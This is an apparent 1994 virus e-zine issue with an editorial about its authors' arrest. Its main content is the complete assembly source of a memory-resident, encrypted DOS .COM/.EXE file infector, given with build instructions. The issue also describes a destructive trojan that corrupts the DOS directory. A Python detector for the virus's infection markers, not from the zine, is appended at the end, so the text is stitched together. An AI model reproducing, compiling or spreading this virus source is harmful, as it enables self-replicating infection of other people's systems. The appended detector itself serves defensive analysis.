Viral Lab 102
May 1994

CONTENTS:
Editorial
VIRAL LAB 102's VIRUS #1 SOURCE
SMASH.COM Trojan Horse of the month
Afterword
After-Afterword: Jerusalem-A debug script

EDITORIAL
By Spear

Well, here it is! The long awaited (maybe) #2 issue of Viral Labs! You may wonder why your name was not on the mailing list. That's because we are not going to have a mailing list at all. When you want it, you gotta mail here for it. The reason for this is that when we got busted after the last issue, for reasons which will be explained later in this editorial, the piggies tried to implicate some of the people that were on our mailing list. These people's names will not be mentioned, but the mailing list was submitted as evidence in the case surrounding a group of people and their packet-sniffing project. It was supposedly valid proof that they were people who enjoyed wreaking havoc on systems around the net.

Also, some stupid kid decided to put the trojan horse that was in the last issue onto his network as a substitute for the executable file for WordPerfect. He got caught pretty fast, because he wrote the source code and put his name in it. He had some dumb copyright thing in it, and when the labbies at his college viewed it with a hex editor, lo and behold! The program is named! Plus he bragged all around school about it and accidentally told people who didn't really care if he got kicked out of school or not. Bummer.

The moral of this story is, use this mag for entertainment and education purposes only! Otherwise! You're going to get caught. The other moral is, if you have an e-mag, don't keep a file with people's subscriptions in it lying around the system.

VIRAL LAB 102's VIRUS #1
By Spear

ATTRIBUTES: This is a memory-resident .com and .exe infector. It is encrypted using a method much like DA's encryption methods. The maximum size of this virus is 1000 bytes, which is fairly tiny.
This virus only spreads, there are no trojan horses in it in order to keep it small. It is of the tiny class of virii that P/S creates often. Everytime a file containing this virus is executed, it infects 10 other files on the system. Infects command.com as well. Compile using TASM in non-case sensitive mode. ;Viral Lab 102 Virus of the Month Source code. checkres1 = 'DA' checkres2 = 'PS' id = 'DA' .model tiny .code org 0000h start: ENCRYPT: patchstart: mov bx, offset endencrypt mov cx, (heap-endencrypt)/2+1 encrypt_loop: db 002Eh ; cs: db 0081h ; add word ptr [bx], xxxx xorpatch db 0007h encryptvalue dw 0000h add bx, 0002h loop encrypt_loop endencrypt: call next next: pop bp sub bp, offset next push es push ds mov ax, checkres1 ; Installation check int 0021h cmp ax, checkres2 ; Already installed? jz done_install mov ax, ds dec ax mov ds, ax sub word ptr ds:[0003h], ((endheap-start+1023)/1024)*64 sub word ptr ds:[0012h], ((endheap-start+1023)/1024)*64 mov es, word ptr ds:[0012h] push cs pop ds xor di, di mov cx, (heap-start)/2+1 ; Bytes to move mov si, bp ; lea si,[bp+offset start] rep movsw xor ax, ax mov ds, ax sub word ptr ds:[0413h], (endheap-start+1023)/1024 push ds lds ax, ds:[21h*4] ; Get old int handler mov word ptr es:oldint21, ax mov word ptr es:oldint21+2, ds pop ds mov word ptr ds:[21h*4], offset int21 ; Replace with new handler mov ds:[21h*4+2], es ; in high memory done_install: pop es pop ds cmp sp, id je restore_EXE restore_COM: mov di, 0100h push di lea si, [bp+offset old3] movsw movsb ret restore_EXE: mov ax, ds add ax, 0010h add cs:[bp+word ptr origCSIP+2], ax add ax, cs:[bp+word ptr origSPSS] cli mov ss, ax mov sp, cs:[bp+word ptr origSPSS+2] sti db 00EAh origCSIP db ? old3 db 0cdh,20h,0 origSPSS dd ? int21: push ax push bx push cx push dx push si push di push ds push es cmp ax, 4B00h ; execute? 
jz execute return: jmp exitint21 execute: mov word ptr cs:filename, dx mov word ptr cs:filename+2, ds mov ax, 4300h lds dx, cs:filename int 0021h jc return push cx push ds push dx mov ax, 4301h ; clear file attributes push ax ; save for later use xor cx, cx int 0021h mov ax, 3D02h lds dx, cs:filename int 0021h xchg ax, bx push cs pop ds push cs pop es mov ax, 5700h ; get file time/date int 0021h push cx push dx mov cx, 001Ah mov dx, offset readbuffer mov ah, 003Fh int 0021h mov ax, 4202h xor cx, cx xor dx, dx int 0021h cmp word ptr [offset readbuffer], 'ZM' jz checkEXE mov cx, word ptr [offset readbuffer+1] ; jmp location add cx, heap-start+3 ; convert to filesize cmp ax, cx ; equal if already infected jz jmp_close cmp ax, 03E8h ; check if too large ja jmp_close ; Exit if so mov di, offset old3 mov si, offset readbuffer movsb movsw mov si, ax ; save entry point add si, 0100h mov cx, 0003h sub ax, cx mov word ptr [offset readbuffer+1], ax mov dl, 00E9h mov byte ptr [offset readbuffer], dl jmp short continue_infect checkEXE: cmp word ptr [offset readbuffer+10h], id jnz skipp jmp_close: jmp close skipp: lea di, origCSIP lea si, readbuffer+14h movsw ; Save original CS and IP movsw sub si, 000Ah movsw ; Save original SS and SP movsw push bx ; save file handle mov bx, word ptr [readbuffer+8] ; Header size in paragraphs mov cl, 0004h shl bx, cl push dx ; Save file size on the push ax ; stack sub ax, bx ; File size - Header size sbb dx, 0000h ; DX:AX - BX -> DX:AX mov cx, 0010h div cx ; DX:AX/CX = AX Remainder DX mov word ptr [readbuffer+14h], dx ; IP Offset mov word ptr [readbuffer+10h], id ; Initial SP mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment mov word ptr [readbuffer+16h], ax ; Para disp CS in module. mov si, dx ; save entry point pop ax ; Filelength in DX:AX pop dx add ax, heap-start adc dx, 0000h mov cl, 0009h push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 0001h mov word ptr [readbuffer+2], ax ; the EXE header. 
mov word ptr [readbuffer+4], dx ; Fix-up the file size in pop bx ; restore file handle mov cx, 001Ah continue_infect: push cx ; save # bytes to write mov ah, 002Ch ; Get current time int 0021h add si, (offset endencrypt-offset encrypt) mov word ptr ds:[patchstart+1], si mov word ptr ds:[encryptvalue], dx mov di, offset encryptbuffer mov si, offset ENCRYPT mov cx, (heap-encrypt)/2 push si rep movsw ; copy virus to buffer mov ax, offset endencrypt-encrypt+encryptbuffer mov word ptr ds:[patchstart+1], ax pop si push offset endencrypt mov byte ptr [offset endencrypt], 00C3h ; retn xor byte ptr [offset xorpatch-encrypt+encryptbuffer], 0028h push bx call si ; encrypt virus in buffer pop bx pop word ptr [offset endencrypt] xor byte ptr [offset xorpatch], 0028h mov ah, 0040h mov cx, heap-encrypt mov dx, offset encryptbuffer int 0021h mov ax, 4200h xor cx, cx cwd int 0021h mov dx, offset readbuffer pop cx mov ah, 0040h int 0021h close: mov ax, 5701h ; restore file time/date pop dx pop cx int 0021h mov ah, 003Eh int 0021h pop ax ; restore file attributes pop dx ; get filename and pop ds pop cx ; attributes from stack int 0021h exitint21: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax db 00EAh ; return to original handler oldint21 dd ? heap: encryptbuffer db (heap-encrypt)+1 dup (?) filename dd ? readbuffer db 1ah dup (?) endheap: end start TROJAN HORSE OF THE MONTH: This trojan takes all the files in the \dos directory and copies them as files, which totally ruins the file structure of the system. In order to fix this, a person will have to format his hard-drive because DOS commands are rendered inexecutable and you cannot remove the directories they are in. They are invalid directories, and no matter what is done, a person who is inflicted with this puppy cannot remove the directories or get rid of them without using norton utilities to fix the invalid chains. In order to get the file out of this puppy, in your unix account, type uudecode after clipping here... 
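A defender's check for the two infection markers the virus source above relies on, as an added Python example (not code from the zine): the 'DA' word the infector writes into the EXE header's initial-SP field (offset 10h) and tests to avoid reinfection, and the E9 jump it patches into the first three bytes of a .COM file to reach the appended body. The sample buffers are constructed, not real infected files, and the .COM test is a heuristic based only on the 1000-byte size bound the article states.

```python
import struct

# Values taken from the virus source above: id = 'DA' is a TASM two-character
# word constant (4441h) that the infector stores in the EXE header's
# initial-SP field (offset 10h) and compares against to skip infected files.
INFECTION_MARKER_SP = 0x4441
MAX_VIRUS_LEN = 1000  # the article states the virus is at most 1000 bytes

def parse_mz_header(data: bytes):
    """Return the MZ header fields a scanner needs, or None if not an EXE."""
    if len(data) < 0x1A or data[:2] != b"MZ":
        return None
    (last_page, pages, _relocs, hdr_paras, _minalloc, _maxalloc,
     ss, sp, _checksum, ip, cs) = struct.unpack_from("<11H", data, 2)
    return {"last_page": last_page, "pages": pages, "hdr_paras": hdr_paras,
            "ss": ss, "sp": sp, "ip": ip, "cs": cs}

def header_file_size(hdr: dict) -> int:
    """File length implied by the 512-byte page fields the infector rewrites."""
    size = hdr["pages"] * 512
    if hdr["last_page"]:
        size -= 512 - hdr["last_page"]
    return size

def exe_looks_infected(data: bytes) -> bool:
    """Flag an EXE whose initial-SP field carries the 'DA' marker."""
    hdr = parse_mz_header(data)
    return hdr is not None and hdr["sp"] == INFECTION_MARKER_SP

def com_looks_infected(data: bytes) -> bool:
    """Heuristic for .COM files: the infector overwrites the first three bytes
    with an E9 jmp whose target is the original end of file, and appends a
    body of at most MAX_VIRUS_LEN bytes, so the jump must land in the tail."""
    if len(data) < 3 or data[0] != 0xE9:
        return False
    target = struct.unpack_from("<H", data, 1)[0] + 3  # rel16 is relative to the next instruction
    return 0 < len(data) - target <= MAX_VIRUS_LEN

# Constructed samples (not real infected files): a 26-byte MZ header with the
# marker in the SP field, the same header with an ordinary SP, and two .COM stubs.
INFECTED_EXE = b"MZ" + struct.pack("<11H", 100, 2, 0, 2, 0, 0xFFFF, 0, 0x4441, 0, 0, 0) + b"\0\0"
CLEAN_EXE = b"MZ" + struct.pack("<11H", 100, 2, 0, 2, 0, 0xFFFF, 0, 0x0100, 0, 0, 0) + b"\0\0"
INFECTED_COM = b"\xE9\x10\x00" + b"\x90" * 16 + b"\xCC" * 20  # jmp lands 20 bytes before EOF
CLEAN_COM = b"\xB8\x00\x4C\xCD\x21"                          # mov ax,4C00h / int 21h

if __name__ == "__main__":
    for name, blob, check in [("INFECTED_EXE", INFECTED_EXE, exe_looks_infected),
                              ("CLEAN_EXE", CLEAN_EXE, exe_looks_infected),
                              ("INFECTED_COM", INFECTED_COM, com_looks_infected),
                              ("CLEAN_COM", CLEAN_COM, com_looks_infected)]:
        print(f"{name}: {'suspicious' if check(blob) else 'clean'}")
```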